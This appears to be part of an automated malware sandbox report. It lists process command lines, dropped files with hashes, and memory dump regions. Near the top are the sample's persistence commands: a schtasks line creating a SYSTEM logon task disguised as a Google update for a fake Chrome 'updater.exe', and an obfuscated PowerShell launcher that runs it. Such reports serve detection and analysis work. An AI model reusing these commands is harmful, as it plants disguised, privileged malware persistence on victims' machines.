  cmdline: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
  - Creates scheduled task(s)
- [3] C:\Windows\system32\dialer.exe
  cmdline: C:\Windows\system32\dialer.exe
  - Drops file in Windows directory
- [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  cmdline: powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- [4] C:\Windows\system32\schtasks.exe
  cmdline: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
- [1] C:\Windows\system32\conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe "19387972241512585508775902063-770367084111309219610835078772091967417924537665"
- [1] C:\Windows\system32\conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe "-1762930710-1810975771-1909059443-12986873881983878616-1196646335-4056316831046818306"
- [1] C:\Windows\system32\conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe "465191542-13271134963070762241808683761263050543-1357736105-591656820-1821344793"
- [1] C:\Windows\system32\conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe "-13712896921315988633-646937543-11101801766739312162132436828-1817427182-1620231770"
- [1] C:\Windows\system32\conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe "-926287050-2114319891-21120764151934006926-896352991659170595-543848872-1603390531"
- [1] C:\Windows\system32\conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe "19789499313549780479305097294498776227234904791307150500917444964-1254275782"
- [1] C:\Windows\system32\conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe "726325594-1834741115144071641716349307451237132241990322029-1802753997396983026"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Program Files\Google\Chrome\updater.exe
  Filesize: 2.8MB
  MD5: eb27bb8cfa99d659e4fe023e9002ecd1
  SHA1: c783400302fdfae0518269c5a5a8d4bad29f42a3
  SHA256: 9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
  SHA512: ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
- C:\Program Files\Google\Libs\g.log
  Filesize: 198B
  MD5: 37dd19b2be4fa7635ad6a2f3238c4af1
  SHA1: e5b2c034636b434faee84e82e3bce3a3d3561943
  SHA256: 8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
  SHA512: 86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: afaf3141043b3a7428136495fe12f5c2
  SHA1: 9c089296dc8fe88fbb0d040955458c34363798f2
  SHA256: 1f245b3f07061de00889d83aad133fb2ac368f217e32e4dcb1a6aefdeb63f696
  SHA512: 17e202760e6ff5a4d42ee3292353c8e68a193c7925b44807ef8113f729a67cda603b1ea15d90c8b1afc879547caa05536b536b2ed111a3009af0d0110a8f66f5
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L528LL6EV9QXYFC8S2U5.temp
  Filesize: 7KB
  MD5: afaf3141043b3a7428136495fe12f5c2
  SHA1: 9c089296dc8fe88fbb0d040955458c34363798f2
  SHA256: 1f245b3f07061de00889d83aad133fb2ac368f217e32e4dcb1a6aefdeb63f696
  SHA512: 17e202760e6ff5a4d42ee3292353c8e68a193c7925b44807ef8113f729a67cda603b1ea15d90c8b1afc879547caa05536b536b2ed111a3009af0d0110a8f66f5
- C:\Windows\Tasks\dialersvc32.job
  Filesize: 1KB
  MD5: 24139b140a5eefe7790598725ae1a2ee
  SHA1: 8eb3186794fe51bdc8c90b00be98e4d9341c1069
  SHA256: b3e9853e35550b4d41d8485a2355afa560685348cf779f53ed8aad241db9f40d
  SHA512: d26c807ab110b94c64c8f1bbbeb83b6fc646e382f2753d5563f3caa2a8cb9afea2eef3173c6f27c3360cd4797ddd0a2dc53dc5b772f7bd24172febb397771056
- \??\PIPE\srvsvc
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files\Google\Chrome\updater.exe
Filesize
2.8MB
MD5
eb27bb8cfa99d659e4fe023e9002ecd1
SHA1
c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA256
9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512
ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
memory/280-262-0x0000000001130000-0x000000000115A000-memory.dmp
Filesize
168KB
-
memory/320-133-0x000000013F0F0000-0x000000013F3B8000-memory.dmp
Filesize
2.8MB
-
memory/320-128-0x000000013F0F0000-0x000000013F3B8000-memory.dmp
Filesize
2.8MB
-
memory/340-263-0x0000000001BE0000-0x0000000001C0A000-memory.dmp
Filesize
168KB
-
memory/340-270-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/420-121-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmp
Filesize
64KB
-
memory/420-123-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/420-116-0x00000000007D0000-0x00000000007F3000-memory.dmp
Filesize
140KB
-
memory/420-119-0x0000000000800000-0x000000000082A000-memory.dmp
Filesize
168KB
-
memory/420-117-0x00000000007D0000-0x00000000007F3000-memory.dmp
Filesize
140KB
-
memory/420-137-0x0000000000800000-0x000000000082A000-memory.dmp
Filesize
168KB
-
memory/456-290-0x00000000011F0000-0x0000000001270000-memory.dmp
Filesize
512KB
-
memory/456-317-0x00000000011FB000-0x0000000001232000-memory.dmp
Filesize
220KB
-
memory/456-285-0x00000000009B0000-0x00000000009B8000-memory.dmp
Filesize
32KB
-
memory/456-318-0x0000000019E00000-0x0000000019E2A000-memory.dmp
Filesize
168KB
-
memory/456-248-0x00000000011F0000-0x0000000001270000-memory.dmp
Filesize
512KB
-
memory/468-144-0x00000000008B0000-0x00000000008DA000-memory.dmp
Filesize
168KB
-
memory/468-129-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/468-125-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmp
Filesize
64KB
-
memory/468-122-0x00000000008B0000-0x00000000008DA000-memory.dmp
Filesize
168KB
-
memory/476-131-0x00000000001E0000-0x000000000020A000-memory.dmp
Filesize
168KB
-
memory/476-149-0x00000000001E0000-0x000000000020A000-memory.dmp
Filesize
168KB
-
memory/476-135-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/476-134-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmp
Filesize
64KB
-
memory/484-143-0x00000000001D0000-0x00000000001FA000-memory.dmp
Filesize
168KB
-
memory/484-151-0x00000000001D0000-0x00000000001FA000-memory.dmp
Filesize
168KB
-
memory/484-145-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmp
Filesize
64KB
-
memory/484-148-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/528-276-0x00000000001E0000-0x000000000020A000-memory.dmp
Filesize
168KB
-
memory/556-112-0x00000000774A0000-0x00000000775BF000-memory.dmp
Filesize
1.1MB
-
memory/556-111-0x00000000775C0000-0x0000000077769000-memory.dmp
Filesize
1.7MB
-
memory/556-287-0x00000000003C0000-0x00000000003EA000-memory.dmp
Filesize
168KB
-
memory/556-109-0x0000000140000000-0x0000000140042000-memory.dmp
Filesize
264KB
-
memory/556-113-0x0000000140000000-0x0000000140042000-memory.dmp
Filesize
264KB
-
memory/556-107-0x0000000140000000-0x0000000140042000-memory.dmp
Filesize
264KB
-
memory/568-138-0x0000000001090000-0x00000000010D0000-memory.dmp
Filesize
256KB
-
memory/568-142-0x0000000001090000-0x00000000010D0000-memory.dmp
Filesize
256KB
-
memory/568-141-0x0000000001090000-0x00000000010D0000-memory.dmp
Filesize
256KB
-
memory/584-371-0x0000000000120000-0x000000000013B000-memory.dmp
Filesize
108KB
-
memory/584-373-0x00000000003C0000-0x00000000003E1000-memory.dmp
Filesize
132KB
-
memory/592-308-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/592-284-0x00000000007C0000-0x00000000007EA000-memory.dmp
Filesize
168KB
-
memory/600-158-0x00000000004B0000-0x00000000004DA000-memory.dmp
Filesize
168KB
-
memory/600-161-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmp
Filesize
64KB
-
memory/600-163-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/600-239-0x00000000004B0000-0x00000000004DA000-memory.dmp
Filesize
168KB
-
memory/672-72-0x0000000002510000-0x0000000002590000-memory.dmp
Filesize
512KB
-
memory/672-71-0x0000000002510000-0x0000000002590000-memory.dmp
Filesize
512KB
-
memory/672-68-0x000000001B1B0000-0x000000001B492000-memory.dmp
Filesize
2.9MB
-
memory/672-70-0x0000000002510000-0x0000000002590000-memory.dmp
Filesize
512KB
-
memory/672-69-0x0000000001F90000-0x0000000001F98000-memory.dmp
Filesize
32KB
-
memory/672-73-0x000000000251B000-0x0000000002552000-memory.dmp
Filesize
220KB
-
memory/676-166-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmp
Filesize
64KB
-
memory/676-162-0x00000000005E0000-0x000000000060A000-memory.dmp
Filesize
168KB
-
memory/676-169-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/676-247-0x00000000005E0000-0x000000000060A000-memory.dmp
Filesize
168KB
-
memory/740-249-0x0000000000A10000-0x0000000000A3A000-memory.dmp
Filesize
168KB
-
memory/740-168-0x0000000000A10000-0x0000000000A3A000-memory.dmp
Filesize
168KB
-
memory/740-172-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmp
Filesize
64KB
-
memory/740-261-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/804-272-0x00000000001C0000-0x00000000001EA000-memory.dmp
Filesize
168KB
-
memory/804-282-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/816-254-0x0000000000900000-0x000000000092A000-memory.dmp
Filesize
168KB
-
memory/816-265-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/836-93-0x0000000140000000-0x0000000140056000-memory.dmp
Filesize
344KB
-
memory/848-255-0x0000000000910000-0x000000000093A000-memory.dmp
Filesize
168KB
-
memory/848-264-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/972-268-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/972-259-0x0000000000320000-0x000000000034A000-memory.dmp
Filesize
168KB
-
memory/1004-291-0x00000000001C0000-0x00000000001EA000-memory.dmp
Filesize
168KB
-
memory/1052-266-0x00000000008C0000-0x00000000008EA000-memory.dmp
Filesize
168KB
-
memory/1052-273-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/1072-94-0x0000000002970000-0x00000000029F0000-memory.dmp
Filesize
512KB
-
memory/1072-96-0x0000000002970000-0x00000000029F0000-memory.dmp
Filesize
512KB
-
memory/1072-95-0x0000000002970000-0x00000000029F0000-memory.dmp
Filesize
512KB
-
memory/1072-97-0x000000000297B000-0x00000000029B2000-memory.dmp
Filesize
220KB
-
memory/1136-267-0x0000000001DB0000-0x0000000001DDA000-memory.dmp
Filesize
168KB
-
memory/1136-274-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/1152-62-0x000000000278B000-0x00000000027C2000-memory.dmp
Filesize
220KB
-
memory/1152-61-0x0000000002784000-0x0000000002787000-memory.dmp
Filesize
12KB
-
memory/1152-60-0x0000000001F30000-0x0000000001F38000-memory.dmp
Filesize
32KB
-
memory/1152-59-0x000000001B270000-0x000000001B552000-memory.dmp
Filesize
2.9MB
-
memory/1176-269-0x0000000001BE0000-0x0000000001C0A000-memory.dmp
Filesize
168KB
-
memory/1204-102-0x00000000008B0000-0x00000000008B8000-memory.dmp
Filesize
32KB
-
memory/1204-110-0x000000000123B000-0x0000000001272000-memory.dmp
Filesize
220KB
-
memory/1204-104-0x0000000000E20000-0x0000000000E60000-memory.dmp
Filesize
256KB
-
memory/1204-105-0x00000000775C0000-0x0000000077769000-memory.dmp
Filesize
1.7MB
-
memory/1204-101-0x0000000001230000-0x00000000012B0000-memory.dmp
Filesize
512KB
-
memory/1204-106-0x00000000774A0000-0x00000000775BF000-memory.dmp
Filesize
1.1MB
-
memory/1248-278-0x0000000037600000-0x0000000037610000-memory.dmp
Filesize
64KB
-
memory/1248-271-0x0000000002A10000-0x0000000002A3A000-memory.dmp
Filesize
168KB
-
memory/1256-355-0x0000000000110000-0x000000000013A000-memory.dmp
Filesize
168KB
-
memory/1364-54-0x000000013FF00000-0x00000001401C8000-memory.dmp
Filesize
2.8MB
-
memory/1364-76-0x000000013FF00000-0x00000001401C8000-memory.dmp
Filesize
2.8MB
-
memory/1680-320-0x0000000019C80000-0x0000000019F62000-memory.dmp
Filesize
2.9MB
-
memory/1680-375-0x0000000001270000-0x00000000012F0000-memory.dmp
Filesize
512KB
-
memory/1680-321-0x0000000000A40000-0x0000000000A48000-memory.dmp
Filesize
32KB
-
memory/1928-280-0x00000000002E0000-0x000000000030A000-memory.dmp
Filesize
168KB